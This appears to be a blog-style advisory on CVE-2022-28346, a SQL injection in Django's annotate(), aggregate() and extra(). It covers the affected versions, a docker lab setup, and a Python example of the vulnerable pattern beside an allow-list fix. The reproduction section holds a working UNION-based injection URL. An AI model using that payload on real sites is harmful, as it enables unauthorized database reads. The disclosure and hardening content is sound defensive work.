Cve-2022-28346: Django SQL injection vulnerability
2022-07-08 00:41:00 【yggcwhat】
0x01 Introduction
Django is a free, open-source web framework written in Python. It covers almost every aspect of web application development and can be used to build high-performance, elegant websites quickly. Django ships with many of the modules commonly needed in website back-end development, so developers can concentrate on the business logic.
0x02 Vulnerability summary
CVE ID: CVE-2022-28346
An attacker who controls the contents of a carefully crafted dictionary that is expanded with **kwargs into QuerySet.annotate(), aggregate() or extra() can make those methods susceptible to SQL injection.
0x03 Affected versions
4.0 <= Django < 4.0.4
3.2 <= Django < 3.2.13
2.2 <= Django < 2.2.28
0x04 Environment setup
docker pull s0cke3t/cve-2022-28346:latest
docker run -d -p 8080:8000 s0cke3t/cve-2022-28346
0x05 Reproducing the vulnerability
The error page reveals which endpoints exist.
If the endpoint you access takes parameters, the error message reveals those as well.
Use the parameter named in the error message for the SQL injection:
http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
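The request above works because the `field` value is used unchanged as a key of the dictionary expanded into annotate(), and that key becomes a quoted SQL alias. The following is an added example (not the page's or Django's own code, and it does not need Django installed): it shows the vulnerable key-building pattern next to a hardened version that only accepts aliases from an allow-list and free of SQL metacharacters. The allow-list, the regular expression and the sample parameters are assumptions constructed for the illustration.

```python
import re

# Constructed allow-list for the page's "demo" endpoint; a real view would take
# this from the model's field names rather than hard-coding it (assumption).
ALLOWED_FIELDS = frozenset({"id", "name", "email"})

# Metacharacters that let a dictionary key break out of the quoted SQL alias
# emitted for it: quotes, brackets, semicolons, whitespace and comment markers.
FORBIDDEN_ALIAS = re.compile(r"""['"`\[\];\s]|--|/\*|\*/""")


def is_clean_alias(alias):
    """True when alias looks like a plain identifier with no SQL metacharacters."""
    return bool(alias) and FORBIDDEN_ALIAS.search(alias) is None


def vulnerable_annotate_kwargs(params):
    """The pattern the page describes: the request parameter becomes an
    annotate() key unchanged, so the caller controls the SQL alias."""
    return {params["field"]: "name"}  # in a real view the value would be F("name")


def safe_annotate_kwargs(params, allowed=ALLOWED_FIELDS):
    """Hardened form: the alias must be on the allow-list and pass the
    metacharacter check before it is used as a key for annotate(**kwargs)."""
    alias = params.get("field", "")
    if alias not in allowed or not is_clean_alias(alias):
        raise ValueError("rejected annotation alias: %r" % (alias,))
    return {alias: "name"}


# Constructed request parameters: a benign one and the payload shape from the
# reproduction section above, included only to show the check rejects it.
BENIGN = {"field": "email"}
MALICIOUS = {"field": 'demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --'}


def demo():
    """Return (vulnerable kwargs, hardened kwargs, whether the payload was blocked)."""
    unsafe = vulnerable_annotate_kwargs(MALICIOUS)  # raw payload becomes the alias
    blocked = False
    try:
        safe_annotate_kwargs(MALICIOUS)
    except ValueError:
        blocked = True
    return unsafe, safe_annotate_kwargs(BENIGN), blocked
```

Upgrading to a fixed Django release remains the actual remedy; the allow-list check is defence in depth for views that build annotation names from user input.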
0x06 Fix
An official patched version has been released. Download address:
https://www.djangoproject.com/download/